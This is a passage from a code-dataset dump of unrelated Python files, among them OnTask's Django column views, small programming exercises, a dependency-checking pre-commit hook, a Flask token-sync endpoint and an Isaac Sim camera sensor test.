Each tuple has:\n# - Pandas operation name\n# - Textual description\n# - List of data types that are allowed (for data type checking)\n_formula_column_operands = [\n ('sum', _('sum: Sum selected columns'), ['integer', 'double']),\n (\n 'prod',\n _('prod: Product of the selected columns'),\n ['integer', 'double']),\n ('max', _('max: Maximum of the selected columns'), ['integer', 'double']),\n ('min', _('min: Minimum of the selected columns'), ['integer', 'double']),\n ('mean', _('mean: Mean of the selected columns'), ['integer', 'double']),\n (\n 'median',\n _('median: Median of the selected columns'),\n ['integer', 'double']),\n (\n 'std',\n _('std: Standard deviation over the selected columns'),\n ['integer', 'double']),\n (\n 'all',\n _('all: True when all elements in selected columns are true'),\n ['boolean']),\n (\n 'any',\n _('any: True when any element in selected columns is true'),\n ['boolean']),\n]\n\n\n@method_decorator(ajax_required, name='dispatch')\nclass ColumnBasicView(UserIsInstructor, JSONFormResponseMixin):\n \"\"\"Basic Column View.\"\"\"\n\n http_method_names = ['get', 'post']\n form_class = None\n template_name = None\n\n def get(\n self,\n request: http.HttpRequest,\n *args,\n **kwargs\n ) -> http.JsonResponse:\n \"\"\"Check if the workflow has no rows\"\"\"\n if self.workflow.nrows == 0:\n messages.error(\n request,\n _('Cannot add column to a workflow without data'),\n )\n return http.JsonResponse({'html_redirect': ''})\n\n return super().get(request, *args, **kwargs)\n\n\nclass ColumnCreateView(ColumnBasicView, ColumnView, generic.CreateView):\n \"\"\"Add a column.\"\"\"\n\n form_class = forms.ColumnAddForm\n template_name = 'column/includes/partial_add_edit.html'\n\n def get_context_data(self, **kwargs):\n \"\"\"Insert is_question and add values.\"\"\"\n context = super().get_context_data(**kwargs)\n context.update({'is_question': False, 'add': True})\n return context\n\n def get_form_kwargs(self):\n \"\"\"Add the workflow to the kwargs.\"\"\"\n kwargs = super().get_form_kwargs()\n kwargs['workflow'] = self.workflow\n return kwargs\n\n def form_valid(self, form):\n # Save the column object attached to the form\n column = form.save(commit=False)\n try:\n services.add_column_to_workflow(\n self.request.user,\n self.workflow,\n column,\n form.initial_valid_value)\n form.save_m2m()\n except OnTaskServiceException as exc:\n exc.message_to_error(self.request)\n exc.delete()\n\n return http.JsonResponse({'html_redirect': ''})\n\n\nclass ColumnQuestionAddView(ColumnBasicView, ActionView, generic.FormView):\n \"\"\"Add a new column to a survey action.\"\"\"\n\n form_class = forms.QuestionForm\n template_name = 'column/includes/partial_question_add_edit.html'\n\n def get_form_kwargs(self):\n \"\"\"Add the workflow to the kwargs.\"\"\"\n kwargs = super().get_form_kwargs()\n kwargs['workflow'] = self.workflow\n return kwargs\n\n def get_context_data(self, **kwargs):\n \"\"\"Insert is_question and add values.\"\"\"\n self.object = self.get_object()\n context = super().get_context_data(**kwargs)\n context['add'] = True\n return context\n\n def form_valid(self, form):\n # Get the action first\n action = self.get_object()\n\n # Save the column object attached to the form\n column = form.save(commit=False)\n try:\n services.add_column_to_workflow(\n self.request.user,\n self.workflow,\n column,\n form.initial_valid_value,\n models.Log.ACTION_QUESTION_ADD,\n action)\n form.save_m2m()\n except OnTaskServiceException as exc:\n exc.message_to_error(self.request)\n exc.delete()\n\n 
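# Note: an empty 'html_redirect' value seems to be the convention these\n        # views use to tell the AJAX front end to close the modal and refresh\n        # the current page section rather than navigate to a new URL.\n        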
return http.JsonResponse({'html_redirect': ''})\n\n\nclass ColumnTODOAddView(ColumnBasicView, ActionView, generic.FormView):\n \"\"\"Add a new todo item to an action.\"\"\"\n\n form_class = forms.TODOItemForm\n template_name = 'column/includes/partial_todoitem_add_edit.html'\n\n def get_context_data(self, **kwargs):\n \"\"\"Insert is_question and add values.\"\"\"\n self.object = self.get_object()\n context = super().get_context_data(**kwargs)\n context['add'] = True\n return context\n\n def get_form_kwargs(self):\n \"\"\"Add the workflow to the kwargs.\"\"\"\n kwargs = super().get_form_kwargs()\n kwargs['workflow'] = self.workflow\n return kwargs\n\n def form_valid(self, form):\n # Save the column object attached to the form\n column = form.save(commit=False)\n try:\n services.add_column_to_workflow(\n self.request.user,\n self.workflow,\n column,\n form.initial_valid_value,\n models.Log.ACTION_TODOITEM_ADD,\n self.action)\n form.save_m2m()\n except OnTaskServiceException as exc:\n exc.message_to_error(self.request)\n exc.delete()\n\n return http.JsonResponse({'html_redirect': ''})\n\n\nclass ColumnFormulaAddView(ColumnBasicView, ColumnView, generic.CreateView):\n \"\"\"Add a new formula column.\"\"\"\n\n form_class = forms.FormulaColumnAddForm\n template_name = 'column/includes/partial_formula_add.html'\n wf_pf_selected = 'columns'\n\n def get_form_kwargs(self):\n \"\"\"Add the workflow to the kwargs.\"\"\"\n kwargs = super().get_form_kwargs()\n kwargs['operands'] = _formula_column_operands\n kwargs['columns'] = self.workflow.columns.all()\n return kwargs\n\n def form_valid(self, form):\n column = form.save(commit=False)\n try:\n services.add_formula_column(\n self.request.user,\n self.workflow,\n column,\n form.cleaned_data['op_type'],\n form.selected_columns)\n form.save_m2m()\n except OnTaskServiceException as exc:\n exc.message_to_error(self.request)\n exc.delete()\n\n return http.JsonResponse({'html_redirect': ''})\n\n\nclass ColumnRandomAddView(ColumnBasicView, ColumnView, generic.CreateView):\n \"\"\"Create a column with random values (Modal).\"\"\"\n\n form_class = forms.RandomColumnAddForm\n template_name = 'column/includes/partial_random_add.html'\n\n def get_form_kwargs(self):\n \"\"\"Add the workflow and other params to the kwargs.\"\"\"\n kwargs = super().get_form_kwargs()\n kwargs['workflow'] = self.workflow\n kwargs['allow_interval_as_initial'] = True\n return kwargs\n\n def form_valid(self, form):\n column = form.save(commit=False)\n column.workflow = self.workflow\n column.is_key = False\n column.save()\n\n try:\n services.add_random_column(\n self.request.user,\n self.workflow, column)\n form.save_m2m()\n except services.OnTaskColumnIntegerLowerThanOneError as exc:\n form.add_error(exc.field_name, str(exc))\n return http.JsonResponse({\n 'html_form': render_to_string(\n 'column/includes/partial_random_add.html',\n {'form': form},\n request=self.request),\n })\n except OnTaskServiceException as exc:\n exc.message_to_error(self.request)\n exc.delete()\n except Exception as exc:\n messages.error(\n self.request,\n _('Unable to add random column: {0}').format(str(exc)))\n\n # The form has been successfully processed\n return http.JsonResponse({'html_redirect': ''})\n\n\nclass ColumnEditView(ColumnBasicView, ColumnView, generic.UpdateView):\n \"\"\"Edit and update a column.\"\"\"\n\n form_class = None\n template_name = None\n\n def get_form_kwargs(self):\n \"\"\"Add the workflow and other params to the kwargs.\"\"\"\n kwargs = super().get_form_kwargs()\n kwargs['workflow'] = 
self.workflow\n return kwargs\n\n def get_context_data(self, **kwargs):\n \"\"\"Insert is_question and add values.\"\"\"\n context = super().get_context_data(**kwargs)\n context['add'] = False\n return context\n\n def form_valid(self, form):\n if not form.has_changed():\n return http.JsonResponse({'html_redirect': None})\n\n column = form.save(commit=False)\n services.update_column(\n self.request.user,\n self.workflow,\n column,\n form.old_name,\n form.old_position)\n form.save_m2m()\n\n # Done processing the correct POST request\n return http.JsonResponse({'html_redirect': ''})\n\n\nclass ColumnDeleteView(ColumnBasicView, ColumnView, generic.DetailView):\n \"\"\"Delete a column.\"\"\"\n\n template_name = 'column/includes/partial_delete.html'\n wf_pf_related = ['actions', 'conditions', 'views']\n\n def get_context_data(self, **kwargs):\n \"\"\"Insert is_question and add values.\"\"\"\n context = super().get_context_data(**kwargs)\n context.update({\n # Get the conditions that need to be deleted\n 'cond_to_delete': [\n cond for cond in self.workflow.conditions.all()\n if self.object in cond.columns.all()],\n\n # Get the action filters that need to be deleted\n 'action_filter_to_delete': [\n action for action in self.workflow.actions.all()\n if\n action.filter and self.object in action.filter.columns.all()],\n\n # Get the views with filters that need to be deleted\n 'view_filter_to_delete': [\n view for view in self.workflow.views.all()\n if view.filter and self.object in view.filter.columns.all()]})\n return context\n\n def post(self, request, *args, **kwargs):\n column = self.get_object()\n services.delete_column(self.request.user, self.workflow, column)\n\n # There are various points of return\n from_url = self.request.META['HTTP_REFERER']\n if from_url.endswith(reverse('table:display')):\n return http.JsonResponse(\n {'html_redirect': reverse('table:display')})\n\n return http.JsonResponse({'html_redirect': reverse('column:index')})\n\n\nclass ColumnCloneView(ColumnBasicView, ColumnView, generic.DetailView):\n \"\"\"Clone a column in the table attached to a workflow.\"\"\"\n\n template_name = 'column/includes/partial_clone.html'\n\n def post(self, request, *args, **kwargs):\n # Proceed to clone the column\n column = self.get_object()\n try:\n services.clone_column(request.user, column)\n except Exception as exc:\n messages.error(\n request,\n _('Unable to clone column: {0}').format(str(exc)))\n return http.JsonResponse({'html_redirect': ''})\n\n return http.JsonResponse({'html_redirect': ''})\n","repo_name":"abelardopardo/ontask_b","sub_path":"ontask/column/views/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":11962,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"48"} +{"seq_id":"73824513425","text":"a = int(input())\n\nanswers = []\nfor x in range(a):\n n = int(input())\n ans = 0\n for y in range(1,n):\n ans += 1\n answers.append(str(ans))\n\nprint('\\n'.join(answers))\n","repo_name":"arjun921/Python-TIL","sub_path":"dailyPrograms/2018/4/2/201842.py","file_name":"201842.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42263624123","text":"from dataclasses import asdict, dataclass\n\n\n@dataclass(frozen=False, order=False)\nclass Result:\n total: float\n score: int\n corads: int\n sections: dict\n drawable: dict\n\n def _calculate_damage_score(self, damage) -> int:\n \"\"\"\n Returns a score from 0 - 5 according to 
the provided damage percentage\n \"\"\"\n if damage < 17.9:\n return 0\n\n points = 0\n score_table = (1, 5, 25, 50, 75, 100)\n try:\n while damage > score_table[points]:\n points += 1\n except IndexError:\n if damage > 100:\n return 5\n return 0\n return points\n\n def _get_corads(self, value: int) -> int:\n \"\"\"\n Returns a CORADS score for a value\n \"\"\"\n corads = (0, 21, 21, 21, 25, 100)\n for i, limit in enumerate(corads):\n if value < limit:\n return i\n\n def _get_damage_scores(self, ratios, frames) -> list:\n result = []\n result.append(ratios[0])\n result.append(ratios[2])\n result.append(ratios[4])\n\n new_area = sum(frames[:2])\n try:\n percentA = round(frames[0] / new_area, 5)\n percentB = round(frames[1] / new_area, 5)\n result.append(\n round((ratios[1] * percentA) + (ratios[3] * percentB), 5)\n )\n except ZeroDivisionError:\n result.append(0)\n\n result.append(ratios[5])\n return result\n\n def __init__(\n self,\n result: float,\n sections: list,\n distribution: list,\n frames: list,\n ratios: list,\n ) -> None:\n damages = self._get_damage_scores(ratios, frames)\n scores = []\n for section in damages:\n score = self._calculate_damage_score(section)\n scores.append(score)\n\n self.total = round(result, 5)\n self.score = sum(scores)\n self.corads = self._get_corads(self.total)\n self.sections = {\"damage\": damages, \"scores\": scores}\n self.drawable = {\"damage\": sections, \"distribution\": distribution}\n\n def __str__(self) -> str:\n return str(asdict(self))\n","repo_name":"catneep/covyx","sub_path":"Models/Results.py","file_name":"Results.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20000315257","text":"import unittest\nimport test_code\n\n\nclass test_module_equal(unittest.TestCase):\n\n def test_remainder_equal(self):\n result = test_code.find_remainder(10, 2)\n self.assertEqual(result, 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"tabish-dev/Assignment_1-SQA","sub_path":"test_module_equal.py","file_name":"test_module_equal.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2911630201","text":"def main():\n # prompts the user to take input\n percent = convert(input(\"Fractions: \"))\n print(f'{gauge(percent)}')\n\n\ndef convert(fraction):\n while True:\n try:\n operand1, operand2 = fraction.split('/')\n num1 = int(operand1)\n num2 = int(operand2)\n return num1 * 100 / num2\n except ValueError:\n raise ValueError\n except ZeroDivisionError:\n raise ZeroDivisionError\n\n\ndef gauge(percentage):\n if 0 <= percentage <= 1:\n return 'E'\n elif 99 <= percentage <= 100:\n return 'F'\n elif 1 < percentage < 99:\n return f'{round(percentage)}%'\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Always4ukittu/CS50","sub_path":"CS50p/test_fuel/fuel.py","file_name":"fuel.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5163951060","text":"\"\"\"\nFind a pair with the given sum in an array.\nGiven an unsorted integer array, find a pair with the given sum in it.\n\nExample:-\n \nInput:\n\nnums = [8, 7, 2, 5, 3, 1]\ntarget = 10\n \nOutput:\n \nPair found (8, 2)\nor\nPair found (7, 3)\n\nInput:\n\nnums = [5, 2, 6, 8, 1, 9]\ntarget = 12\n \nOutput: Pair not found\n\n\"\"\"\n\n# Brute force approach\n\n\ndef findPair(nums, 
target):\n\n # Consider each element expect last element\n for i in range(len(nums) - 1):\n\n # Start the i'th element until the last element\n for j in range(i+1, len(nums)):\n\n # If desired sum is found\n if nums[i] + nums[j] == target:\n print(\"Pair found\", (nums[i], nums[j]))\n return\n\n print(\"Pair not found\")\n\n\nif __name__ == \"__main__\":\n\n # nums = [8, 7, 2, 5, 3, 1]\n # target = 10\n\n # nums = [5, 2, 6, 8, 1, 9]\n # target = 12\n\n nums = [37, 99, 23, 46]\n target = 60\n\n findPair(nums, target)\n\n# Time complexity:- o(n^2)\n# Space complexity:- o(1)\n\n# -----------------------------------------------------------------------------------\n\n# Using sorting method, where we will maintain to pointers low and high.\n\n\ndef findPair(nums, target):\n\n # sort the array in ascending order\n nums.sort()\n\n # maintain two pointer low and high\n low, high = 0, len(nums) - 1\n\n # loop till the search space is exhausted\n while low < high:\n if nums[low] + nums[high] == target:\n print('Pair found', (nums[low], nums[high]))\n return\n\n # increment 'low' if the total is less than the desired sum\n # decrement 'high' if the total is more than the desired sum\n if nums[low] + nums[high] < target:\n low += 1\n else:\n high -= 1\n\n print(\"Pair not found\")\n\n\nif __name__ == \"__main__\":\n\n nums = [8, 7, 2, 5, 3, 1]\n target = 10\n\n # nums = [5, 2, 6, 8, 1, 9]\n # target = 12\n\n # nums = [37, 99, 23, 46]\n # target = 60\n\n findPair(nums, target)\n\n # Time complexity:- o(n.log(n))\n # Space complexity:- o(1)\n\n#\n","repo_name":"rahulpandey70/LeetCode-Questions","sub_path":"Topics/array/FindAPairWithGivenSum.py","file_name":"FindAPairWithGivenSum.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"24447151641","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom products.views import product_detail\n\n\nurlpatterns = [\n path('api-auth/', include('rest_framework.urls')),\n path('rest-auth/', include('rest_auth.urls')),\n path('rest-auth/registration/', include('rest_auth.registration.urls')),\n path('admin/', admin.site.urls),\n path('api/', include('articles.api.urls')),\n # product detail view\n path('', product_detail, name='detail')\n]\n","repo_name":"jdlee6/django-react-app","sub_path":"backend/src/djreact/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20515837691","text":"import logging\nimport traceback\nfrom pre_commit_hook.colors import red, soft_white, reset\nfrom pre_commit_hook.configs import version\nfrom pre_commit_hook.dependencies import check_dependencies\nfrom pre_commit_hook.errors import UserError, RepoError, CheckDependenciesError\nfrom pre_commit_hook.git import get_repository, get_user\nfrom pre_commit_hook.tmp_file import save_on_tmp\nfrom pre_commit_hook.utils import generate_uuid\n\nlogger = logging.getLogger(\"pre-commit\")\n\n\ndef main():\n \"\"\"\n Analyze dependency versions and report if there are new versions\n When check skipped is True, this always returns 0.\n \"\"\"\n exit_code = 0\n check_skipped = False\n uuid = None\n repo = None\n result = \"\"\n try:\n uuid = generate_uuid()\n email = get_user()\n repo = get_repository()\n result = check_dependencies()\n if result != \"\":\n print(f\"{soft_white}*** These dependencies must be updated ***\\n\\n{result}{reset}\")\n 
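# Each failure mode below maps to its own exit code (1: no git user,\n    # 2: no repository URL, 3: dependency check failed, 4: unexpected error);\n    # any non-zero code blocks the commit unless check_skipped is set.\n    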
except UserError as err:\n exit_code = 1\n logger.error(\"[repo:%s][check_skipped:%s][exit_code:%s][uuid:%s][error:%s]\", repo, check_skipped, exit_code, uuid, err)\n print(f\"{red}No user was found. Please set up your user email with `git config user.email ...` or with --global to set it globally.{reset}\")\n except RepoError as err:\n exit_code = 2\n logger.error(\"[repo:%s][check_skipped:%s][exit_code:%s][uuid:%s][error:%s]\", repo, check_skipped, exit_code, uuid, err)\n print(f\"{red}No repository was found. Please set up your repository url with `git config remote.origin.url `.{reset}\")\n except CheckDependenciesError as err:\n exit_code = 3\n logger.error(\"[repo:%s][check_skipped:%s][exit_code:%s][uuid:%s][error:%s]\", repo, check_skipped, exit_code, uuid, err)\n print(f\"{red}There was an error checking dependencies versions.{reset}\")\n except Exception as err:\n exit_code = 4\n logger.error(\"[repo:%s][check_skipped:%s][exit_code:%s][uuid:%s][error:[msg:%s][type:%s][stack_trace:%s]]\", repo, check_skipped, exit_code, \n uuid, err, type(err).__name__, traceback.format_exc())\n print(f\"{red}There was an unexpected error processing your commit.\\nPlease contact us in slack channel #ops-it-team.{reset}\")\n finally:\n # if skip_check is TRUE or exit_code is 0, then the commit is NOT blocked, only on that case the file is created\n if exit_code == 0 or check_skipped:\n save_on_tmp(uuid, version, exit_code)\n if check_skipped:\n return 0\n return exit_code\n\n\nif __name__ == '__main__':\n raise SystemExit(main())\n","repo_name":"mastillisano/hook-test","sub_path":"pre_commit_hook/pre_commit.py","file_name":"pre_commit.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1962103239","text":"from dataclasses import dataclass, field\nfrom typing import Optional\nimport json\nimport re\n\n\n@dataclass\nclass HttpResponse:\n status_code: int\n headers: dict = field(default_factory=list)\n body: Optional[str] = None\n version: str = '1.0'\n\n def json(self):\n return json.loads(self.body)\n\n @staticmethod\n def from_str(message: str):\n lines = message.split('\\n')\n _, version, status_code, _ = re.split(r'HTTP/(.*) ([2-5][0-9]{2}) .*', lines[0])\n body = None\n headers = {}\n for num, line in enumerate(lines[1:]):\n if len(line.strip()) == 0:\n body = '\\n'.join(lines[num + 2:])\n break\n header = line[:line.index(':')]\n value = line[line.index(':') + 1:].strip()\n headers[header] = value\n return HttpResponse(status_code=int(status_code),\n headers=headers,\n body=body,\n version=version)\n","repo_name":"vessellook/2020-1-Atom-QA-Python-A-Vessellook","sub_path":"hw6/code/client/http_response.py","file_name":"http_response.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72767875346","text":"import numpy as np\n\nwith open('H:/Workspaces/Walk-Assistant/data/frames/annotation.txt', 'r') as f:\n lines = f.readlines()\n\ntext = ''\nfor index, line in enumerate(lines):\n if \"GOPR5068.MP4_2772.jpg\" in line:\n text = line\n\nprint(text)\n\nfile, encode = str(text).replace('\\n', '').split(',')\n\narr = []\nfor b in encode:\n arr.append(int(b))\n\narr = np.array(arr).reshape((9, 
16))\n\nprint(arr)\n","repo_name":"YoongiKim/Walk-Assistant","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"48"}
+{"seq_id":"38122479350","text":"def topKFrequent(nums, k: int):\n    count = {}\n    freq = [[] for i in range(len(nums) + 1)]\n\n    for n in nums:\n        count[n] = 1 + count.get(n, 0)\n    for n, c in count.items():\n        freq[c].append(n)\n\n    res = []\n    for i in range(len(freq) - 1, 0, -1):\n        for n in freq[i]:\n            res.append(n)\n            if len(res) == k:\n                return res\n#O(N)\nfrom collections import Counter\ndef topKFrequent1(nums, k):\n    \"\"\"\n    :type nums: List[int]\n    :type k: int\n    :rtype: List[int]\n    \"\"\"\n    # Use Counter to extract the top k frequent elements\n    # most_common(k) returns a list of tuples, where the first item of the tuple is the element,\n    # and the second item of the tuple is the count\n    # Thus, a list comprehension can pull the first item out of each tuple\n    return [num for num, _ in Counter(nums).most_common(k)]\n\ndef test():\n    test_cases = [\n        {\n            \"name\": \"simple case 1\",\n            \"input\": [1,1,1,2,2,3],\n            \"input1\": 2,\n            \"expected\": [1,2]\n        },\n        {\n            \"name\": \"simple case 2\",\n            \"input\": [1],\n            \"input1\": 1,\n            \"expected\": [1]\n        }\n    ]\n\n    for test_case in test_cases:\n        assert test_case[\"expected\"] == topKFrequent(test_case[\"input\"], test_case[\"input1\"]), test_case[\"name\"]\n\nif __name__ == \"__main__\":\n    from datetime import datetime\n    start_time = datetime.now()\n    test()\n    print(\"Everything passed\")\n    end_time = datetime.now()\n    print('Duration: {}'.format(end_time - start_time))","repo_name":"0xspringtime/leetcode","sub_path":"0347.py","file_name":"0347.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"17835430233","text":"from app import app\nfrom flask import jsonify\nfrom .constants import mongoClient, tokenLength\n\n@app.route('/api/v1/sincronizarDispositivo/<registrationToken>', methods=['GET'])\ndef syncDevice(registrationToken):\n    if len(registrationToken) != tokenLength:\n        #abort(404)\n        return jsonify({'code': -1, \"message\":\"El token introducido debe tener una longitud de seis caracteres.\"})\n\n    if mongoClient[\"tmpPatientToken\"].count_documents({'id': registrationToken, 'synced': False}) > 0:\n        mongoClient[\"tmpPatientToken\"].update_one({'id': registrationToken}, {\"$set\": {'synced': True}})\n        return jsonify({'code': 0, \"message\":u\"Paciente sincronizado correctamente.\"})\n    \n    elif mongoClient[\"tmpPatientToken\"].count_documents({'id': registrationToken, 'synced': True}) > 0:\n        return jsonify({'code': 1, \"message\":u\"El token introducido ya ha sido usado por otro paciente.\"})\n    \n    else:\n        return jsonify({'code': 2, \"message\":u\"El token introducido no es correcto.\"})","repo_name":"asdrgil/tfm-server","sub_path":"web/app/routesApi.py","file_name":"routesApi.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"2526946894","text":"from django.urls import path, include\nfrom . 
import views\n\nurlpatterns = [\n path('', views.home, name=\"home\"),\n path('profile/', views.studentProfile, name=\"profile\"),\n path('profile/kartu-peserta/', views.render_register_card_view, name=\"profile-card\"),\n path('profile/ayah/', views.ProfileView.as_view(), name=\"profile-ayah\"),\n path('profile/ibu/', views.MoatherProfileView.as_view(), name=\"profile-ibu\"),\n path('profile/siswa/', views.StudentProfileView.as_view(), name=\"profile-siswa\"),\n path('profile/wali/', views.GuardianProfileView.as_view(), name=\"profile-wali\"),\n path('profile/jurusan/', views.MajorStudentView.as_view(), name=\"jurusan-siswa\"),\n path('profile/berkas/', views.FilesStudentView.as_view(), name=\"berkas-siswa\"),\n]\n","repo_name":"supimadi/ppdb","sub_path":"primaseru/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74462183504","text":"import omni.kit.test\nimport numpy as np\nfrom omni.isaac.core import World\nfrom omni.isaac.core.utils.stage import create_new_stage_async, update_stage_async\nfrom omni.isaac.core.utils.semantics import add_update_semantics\nimport omni.isaac.core.utils.numpy.rotations as rot_utils\nfrom omni.isaac.core.objects import DynamicCuboid\nfrom omni.isaac.core.prims import XFormPrim\nfrom omni.isaac.sensor import Camera\nimport math\nimport asyncio\n\n\nclass TestCameraSensor(omni.kit.test.AsyncTestCase):\n # Before running each test\n async def setUp(self):\n await create_new_stage_async()\n self.my_world = World(stage_units_in_meters=1.0)\n await self.my_world.initialize_simulation_context_async()\n await update_stage_async()\n self.my_world.scene.add_default_ground_plane()\n self.cube_2 = self.my_world.scene.add(\n DynamicCuboid(\n prim_path=\"/new_cube_2\",\n name=\"cube_1\",\n position=np.array([5.0, 3, 1.0]),\n scale=np.array([0.6, 0.5, 0.2]),\n size=1.0,\n color=np.array([255, 0, 0]),\n )\n )\n\n self.cube_3 = self.my_world.scene.add(\n DynamicCuboid(\n prim_path=\"/new_cube_3\",\n name=\"cube_2\",\n position=np.array([-5, 1, 3.0]),\n scale=np.array([0.1, 0.1, 0.1]),\n size=1.0,\n color=np.array([0, 0, 255]),\n linear_velocity=np.array([0, 0, 0.4]),\n )\n )\n self.xform = self.my_world.scene.add(\n XFormPrim(\n prim_path=\"/World/rig\",\n name=\"rig\",\n position=np.array([5.0, 0.0, 5.0]),\n orientation=rot_utils.euler_angles_to_quats(np.array([0, -90, 0]), degrees=True),\n )\n )\n self.camera = self.my_world.scene.add(\n Camera(\n prim_path=\"/World/rig/camera\",\n name=\"camera\",\n position=np.array([0.0, 0.0, 25.0]),\n frequency=20,\n resolution=(256, 256),\n orientation=rot_utils.euler_angles_to_quats(np.array([0, 90, 0]), degrees=True),\n )\n )\n add_update_semantics(self.cube_2.prim, \"cube\")\n add_update_semantics(self.cube_3.prim, \"cube\")\n await update_stage_async()\n await update_stage_async()\n await self.my_world.reset_async()\n await update_stage_async()\n await update_stage_async()\n return\n\n # After running each test\n async def tearDown(self):\n self.camera = None\n self.my_world.clear_instance()\n await omni.kit.app.get_app().next_update_async()\n while omni.usd.get_context().get_stage_loading_status()[2] > 0:\n print(\"tearDown, assets still loading, waiting to finish...\")\n await asyncio.sleep(1.0)\n await omni.kit.app.get_app().next_update_async()\n return\n\n async def test_world_poses(self):\n position, orientation = self.camera.get_world_pose()\n self.assertTrue(np.isclose(position, [0, 0, 25], 
atol=1e-05).all())\n self.assertTrue(\n np.isclose(\n orientation, rot_utils.euler_angles_to_quats(np.array([0, 90, 0]), degrees=True), atol=1e-05\n ).all()\n )\n translation, orientation = self.camera.get_local_pose()\n self.assertTrue(np.isclose(translation, [20, 0, 5], atol=1e-05).all())\n self.assertTrue(\n np.isclose(\n orientation, rot_utils.euler_angles_to_quats(np.array([0, 180, 0]), degrees=True), atol=1e-05\n ).all()\n )\n self.camera.set_local_pose(\n translation=[0, 0, 25], orientation=rot_utils.euler_angles_to_quats(np.array([0, 180, 0]), degrees=True)\n )\n return\n\n async def test_local_poses(self):\n return\n\n async def test_projection(self):\n for i in range(100):\n await update_stage_async()\n points_2d = self.camera.get_image_coords_from_world_points(\n np.array([self.cube_3.get_world_pose()[0], self.cube_2.get_world_pose()[0]])\n )\n # visual inspection golden values\n print(points_2d)\n self.assertTrue(np.isclose(points_2d[0], [103.51783101, 250.41131911]).all())\n self.assertTrue(np.isclose(points_2d[1], [54.40569416, 5.34284676]).all())\n points_3d = self.camera.get_world_points_from_image_coords(points_2d, np.array([24.94, 24.9]))\n self.assertTrue(np.isclose(points_3d[0], [-4.99799372, 0.99959505, 0.06]).all())\n self.assertTrue(np.isclose(points_3d[1], [4.99999901, 2.99999974, 0.1]).all())\n return\n\n async def test_data_acquisition(self):\n for i in range(100):\n await update_stage_async()\n self.camera.resume()\n for annotator in [\n \"pointcloud\",\n \"normals\",\n \"motion_vectors\",\n \"occlusion\",\n \"distance_to_image_plane\",\n \"distance_to_camera\",\n \"bounding_box_2d_tight\",\n \"bounding_box_2d_loose\",\n \"semantic_segmentation\",\n \"instance_id_segmentation\",\n \"instance_segmentation\",\n ]:\n getattr(self.camera, \"add_{}_to_frame\".format(annotator))()\n # frequency is set to 20, rendering rate is set to 120, so do 6 updates to make sure always have a frame\n await update_stage_async()\n await update_stage_async()\n await update_stage_async()\n await update_stage_async()\n await update_stage_async()\n await update_stage_async()\n data = self.camera.get_current_frame()\n self.assertTrue(len(data[annotator]) > 0, f\"{annotator}\")\n getattr(self.camera, \"remove_{}_from_frame\".format(annotator))()\n await update_stage_async()\n data = self.camera.get_current_frame()\n self.assertTrue(annotator not in data.keys(), f\"{annotator}\")\n return\n\n async def test_properties(self):\n self.camera.set_focal_length(5.0)\n self.assertTrue(self.camera.get_focal_length() == 5.0)\n self.camera.set_focus_distance(0.01)\n self.assertTrue(math.isclose(self.camera.get_focus_distance(), 0.01, abs_tol=0.005))\n self.camera.set_lens_aperture(0.01)\n self.assertTrue(math.isclose(self.camera.get_lens_aperture(), 0.01, abs_tol=0.005))\n self.camera.set_horizontal_aperture(1.2)\n self.assertTrue(math.isclose(self.camera.get_horizontal_aperture(), 1.2, abs_tol=0.1))\n self.camera.set_vertical_aperture(1.2)\n self.assertTrue(math.isclose(self.camera.get_vertical_aperture(), 1.2, abs_tol=0.1))\n self.camera.set_clipping_range(1.0, 1.0e5)\n clipping_range = self.camera.get_clipping_range()\n self.assertTrue(math.isclose(clipping_range[0], 1.0, abs_tol=0.1))\n self.assertTrue(math.isclose(clipping_range[1], 1.0e5, abs_tol=0.1))\n self.camera.set_projection_type(\"fisheyeOrthographic\")\n self.assertTrue(self.camera.get_projection_type() == \"fisheyeOrthographic\")\n # TODO: this causes a segfault\n # self.camera.set_projection_mode(\"orthographic\")\n # 
